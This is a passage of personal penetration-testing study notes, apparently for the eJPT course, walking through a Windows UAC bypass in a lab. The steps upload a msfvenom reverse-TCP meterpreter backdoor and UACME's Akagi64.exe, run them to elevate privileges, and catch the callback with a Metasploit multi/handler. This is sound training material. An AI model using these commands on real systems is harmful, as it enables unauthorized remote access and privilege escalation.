Miss-ikky/Mywiki/EJPT/Host & Network Penetration Testing/1. System and hostbased attacks/Windows/Windows Vulnerabilities.md

 		- pgrep explorer (to find processid for explorer.exe)
 		- migrate 2448 (we want to migrate to explorer session and get a 64bit meterpeter session)
 		- sysinfo
+	- part 2
+		- pwd
+		- getuid
+		- getpr (to check that you still don't have privileges)
+		- cd C://
+		- mkdir Temp (best location for exploit code, don't upload to locations that are frequently accessed by users )
+		- cd temp
+		- upload backdoor.exe
+		- upload /root/Desktop/tools/UACME/Akagi64.exe
+		- right now we cannot execute these files with administrator privileges because UAC will prevent us so we need to Bypass uac
+	- .\Akagi64.exe 23 c:\Temp\\backdoor.exe
+		- now go back to listener
+	- new tab in meterpeter
+		- Generate payload:  msfvenom -p windows/meterpreter/reverse_tcp LHOST=yourip LPORT=1234 -f exe > backdoor.exe
+		- set up listernet with msfconsole (new metasploit session)
+			- set up multihandler to receive the connection once the payload is executed on the target
+			- use multi/handler
+			- set payload windows/meterpreter/revers_tcp
+			- set LHOST to kali ip and LPORT to 1234
+			- run and now go back to other meterpreter session (part 2)
+	- after running akigai you should see stage being sent
+	- run sysinfo
+	- run getuid
+	- get privs (no you see you have elevated privileges even though you are an admin account and not administrator)
+		- ps (list process tree)
+			- you can migrate to any other services: migrate processid
+			- getuid

 ![[Pasted image 20230705214848.png]]
 		Now we are admin, who  is not administrator but part of the local administrators group